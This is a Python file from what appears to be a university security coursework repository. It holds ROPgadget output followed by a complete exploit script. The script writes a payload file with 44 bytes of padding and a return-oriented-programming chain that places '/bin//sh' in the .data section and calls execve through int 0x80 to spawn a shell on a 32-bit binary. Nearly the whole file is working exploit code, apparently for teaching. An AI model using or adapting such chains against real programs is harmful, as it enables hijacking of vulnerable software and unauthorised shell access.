security-cw/docs/script_reference.py
Liam Dalgarno b5ef4f9a27 Add example scripts
Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com>
Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
2020-11-28 17:40:49 +00:00

81 lines
2.4 KiB
Python

# ROP chain generation
# ===========================================================
# - Step 1 -- Write-what-where gadgets
# [+] Gadget found: 0x8056cf5 mov dword ptr [edx], eax ; ret
# [+] Gadget found: 0x806e23b pop edx ; ret
# [+] Gadget found: 0x80a89e6 pop eax ; ret
# [+] Gadget found: 0x80562b0 xor eax, eax ; ret
# - Step 2 -- Init syscall number gadgets
# [+] Gadget found: 0x80562b0 xor eax, eax ; ret
# [+] Gadget found: 0x807b6da inc eax ; ret
# - Step 3 -- Init syscall arguments gadgets
# [+] Gadget found: 0x80481c9 pop ebx ; ret
# [+] Gadget found: 0x806e262 pop ecx ; pop ebx ; ret
# [+] Gadget found: 0x806e23b pop edx ; ret
# - Step 4 -- Syscall gadget
# [+] Gadget found: 0x80495f3 int 0x80
# - Step 5 -- Build the ROP chain
#!/usr/bin/env python2
# execve generated by ROPgadget
from struct import pack
import sys
out_file = sys.argv[1]
p = b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
p += pack('<I', 0x0806e23b) # pop edx ; ret
p += pack('<I', 0x080d9060) # @ .data
p += pack('<I', 0x080a89e6) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x08056cf5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e23b) # pop edx ; ret
p += pack('<I', 0x080d9064) # @ .data + 4
p += pack('<I', 0x080a89e6) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x08056cf5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e23b) # pop edx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x080562b0) # xor eax, eax ; ret
p += pack('<I', 0x08056cf5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080d9060) # @ .data
p += pack('<I', 0x0806e262) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x080d9060) # padding without overwrite ebx
p += pack('<I', 0x0806e23b) # pop edx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x080562b0) # xor eax, eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x080495f3) # int 0x80
with open(out_file, "wb") as f:
f.write(p)